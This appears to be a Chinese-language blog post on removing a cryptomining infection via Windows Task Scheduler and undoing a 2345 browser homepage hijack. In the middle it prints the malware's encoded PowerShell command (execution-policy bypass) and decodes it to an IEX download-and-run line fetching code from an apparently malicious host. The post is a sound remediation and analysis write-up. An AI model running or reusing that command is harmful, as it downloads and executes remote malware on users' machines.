不久之前一个学长向我求助,表示自己的电脑中了挖矿病毒,开机总是会自动执行一些恶意程序,导致CPU被霸占,电脑运行速度变慢,同时C盘中还会不定期的出现一些恶意软件。而自己近日由于系统问题重置了自己的系统,重置前忘了对WinRAR压缩软件进行备份,一时疏忽在网上下载了垃圾软件,后电脑每次开机总会安装一些流氓软件到C盘。

如图:

 

 

 

 这是挖矿病毒在C盘自动安装并执行的程序。

 

 

解决方法:

解决此类问题有一个通用的办法就是打开你的任务计划程序,方法很简单,在搜索栏中直接搜索。如图:

 

 打开后可看到:

 

 你系统中会定时执行的程序都在这里。而一些恶意软件就是在这里植入了自己的“恶行”,导致系统自动执行一些恶意程序,或者自动下载软件。如挖矿病毒的恶意计划程序:

 

 而本人电脑上被安装的也是一个类似的依托360安全浏览器自动下载流氓软件的任务计划程序。

直接将其禁用,并删除,即可解决以上问题!!同时也要将自动下载的恶意程序、软件和带来这些恶果的流氓软件一并卸载删除!!

 

那么,这些恶意程序是如何工作的呢?

我在挖矿病毒自动执行的程序中看到了它自动运行的代码如下:

powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAY
wBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQA
cAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA

也就是在powershell中自动运行后面的代码段,我用base64对其进行解密,以下是解密的代码python:

C:\Users\pc>python
Python 3.6.4 (v3.6.4:d48eceb, Dec 19 2017, 06:54:40) [MSC v.1900 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> url = "SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjAHMALgBzAHMAbABzAG4AZwB5AGwAOQAwAC4AYwBvAG0AJwApACkA"
>>> str_url = base64.b64decode(url)
>>> print(str_url)
b"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url = base64.b64decode(url).decode("utf-8")
>>> str(str_url)
"I\x00E\x00X\x00 \x00(\x00(\x00n\x00e\x00w\x00-\x00o\x00b\x00j\x00e\x00c\x00t\x00 \x00n\x00e\x00t\x00.\x00w\x00e\x00b\x00c\x00l\x00i\x00e\x00n\x00t\x00)\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00s\x00t\x00r\x00i\x00n\x00g\x00(\x00'\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00.\x00s\x00s\x00l\x00s\x00n\x00g\x00y\x00l\x009\x000\x00.\x00c\x00o\x00m\x00'\x00)\x00)\x00"
>>> str_url.replace('\x00','')
"IEX ((new-object net.webclient).downloadstring('http://cs.sslsngyl90.com'))"

替换掉其中的乱码,可以得到一个网址:http://cs.sslsngyl90.com

打开就发现了其中的“奥秘”

 

 以上就是此类恶意软件的简单解决办法。

 

浏览器默认主页变成2345的解决方法

对于这个问题,网络上的解答方法有很多,这里介绍一种一般情况下可以彻底根治且不需要下载杀毒软件的方法。

1、首先不用多说,先将你下载的流氓软件和2345浏览器一并卸载。一般卸载完毕后打开浏览器主页还是2345不会改变(不然怎么叫流氓呢)

2、然后按win+R,输入msconfig,打开“启动”选项,在点击“打开任务管理器”,此时可以看到一个进程“winhost.exe”如图,可以先将其禁用:

 

3、右键选择打开文件所在位置,便可看到这个exe文件,一般它会位于C:\Users\pc\AppData\Local\FLYSVR这个位置,同时一般你还可以在C:\Users\pc\AppData\Local这个位置找到2345Explorer文件夹。C:\Users\pc\AppData\Local这个路径可能无法直接找到,可以在搜索栏直接前往,同时,很多困扰你电脑的流氓软件都可以在这里清理)

4、接下来将2345Explorer和winhost.exe所在的FLYSVR文件夹一并强制删除即可(如果无法删除FLYSVR或者winhost.exe文件,可以在任务管理器的进程中找到winhost.exe这个进程,将其结束,然后再删除即可)。

5、完成上述步骤后,还需要进入浏览器的设置界面,将默认主页设置成你需要的主页如百度等,这里以Firefox浏览器和IE浏览器为例,如图:

 

 

 

 

6、接下来重启电脑即可。(可能你会发现winhost.exe仍然在启动进程里,但其实已经失效)

一般经过上述步骤,就可以解决浏览器默认主页变成2345的问题。关于如何解决流氓软件、挖矿病毒的问题可以关注我的上一个帖子。

祝大家远离流氓软件。